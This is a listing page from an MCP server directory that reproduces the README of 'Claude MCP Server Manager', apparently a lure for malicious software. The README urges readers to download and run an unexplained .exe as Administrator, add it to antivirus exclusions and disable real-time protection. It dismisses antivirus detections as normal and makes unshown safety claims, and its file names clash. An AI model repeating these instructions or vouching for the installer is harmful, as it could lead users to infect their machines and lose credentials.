MCP Servers

模型上下文协议服务器、框架、SDK 和模板的综合目录。

C
Claude MCP Server

MCP server manager 2026 | Claude AI | Last update 2026 | Interact with windows

创建于 5/30/2026
更新于 about 5 hours ago
Repository documentation and setup instructions

⚡ Claude MCP Server Manager

One-Click Setup — 50+ MCP Servers • Zero Configuration • Instant Access

Version License Download Platform


📌 About

Claude MCP Server Manager is an all-in-one installer for MCP (Model Context Protocol) servers. Our goal is to simplify your server setup and automate all processes.

⚡ Features

| Category | MCP Servers | What Claude Can Do | |----------|-------------|---------------------| | 📁 SYSTEM | Filesystem • Shell • Terminal | Read/write any file • Run system commands | | 🐙 GIT | GitHub • GitLab • Bitbucket | Clone repos • Create PRs • Push commits | | 🗄️ DATABASE | PostgreSQL • MySQL • SQLite • MongoDB | Query databases • Modify tables | | 🌐 BROWSER | Playwright • Puppeteer • Browser Tools | Control browser • Take screenshots • Scrape sites | | 📦 DEV TOOLS | Docker • Kubernetes • VS Code | Manage containers • Deploy apps | | 🔗 API | REST • GraphQL • Stripe • Slack • Notion | Call any API • Automate workflows | | 🧠 AI | Ollama • OpenAI • Local Models | Run local LLMs • Generate images | | 📊 DATA | Excel • CSV • Pandas | Read spreadsheets • Analyze data |

Total: 50+ MCP servers • 200+ tools


📥 Download CLICK


🚀 HOW TO INSTALL?

  1. Download ClaudeMCP.exe
  2. Extract the archieve
  3. Run ClaudeMCP1.2.exe
  4. Follow the installer's instructions

✅ VERIFICATION

  • After installation, open Claude Desktop and type: What MCP servers do I have access to?
  • You should see a list of all 50+ servers with their tools.

❓ FAQ

Is this free? Yes. 100% free. No subscriptions, no API keys needed.
Do I need a paid Claude account? No. Works with free tier Claude accounts.
Will Claude get slower? MCP servers run locally on your machine. No impact on Anthropic's servers.
Is this safe? All MCP servers are from official GitHub repositories. The installer is open-source (check the `/src` folder).
Antivirus deleted the file. What do I do? Add to exclusions and re-download. The installer patches config files — that's how all software works.
Does this work on Mac/Linux? Windows version only for now. Mac version coming in 2 weeks.

⚠️ TROUBLESHOOTING

| Problem | Solution | |---------|----------| | "Access denied" error | Run installer as Administrator | | Claude won't open after install | Delete %AppData%\AnthropicClaude\claude_desktop_config.backup and restart | | MCP servers not showing | Wait 60 seconds after restart • Type "refresh MCP" in chat | | Antivirus deleted file | Add folder to exclusions • Disable real-time protection temporarily | | Installation stuck at 50% | Close Claude Desktop completely • Check disk space | | "Failed to write config" | Run as Administrator • Check file permissions |


📋 SYSTEM REQUIREMENTS

| Component | Requirement | |-----------|-------------| | OS | Windows 10 / 11 (64-bit) | | Claude Desktop | Version 1.2.0 or higher | | RAM | 4 GB (8 GB recommended for full functionality) | | Storage | 500 MB | | Internet | Required for initial setup | | Admin Rights | Required |


⚠️ NOTES

  • For proper functionality, make sure Claude Desktop is closed before running the installer.
  • Antivirus software may flag the installer as a threat due to configuration file modification. Add the installer to your antivirus exclusions to avoid issues.
  • Use at your own risk. This tool modifies local configuration files.
⭐ Star this repo if it helped you!
快速设置
此服务器的安装指南

安装包 (如果需要)

uvx claude-mcp-server

Cursor 配置 (mcp.json)

{ "mcpServers": { "arenasolsport-claude-mcp-server": { "command": "uvx", "args": [ "claude-mcp-server" ] } } }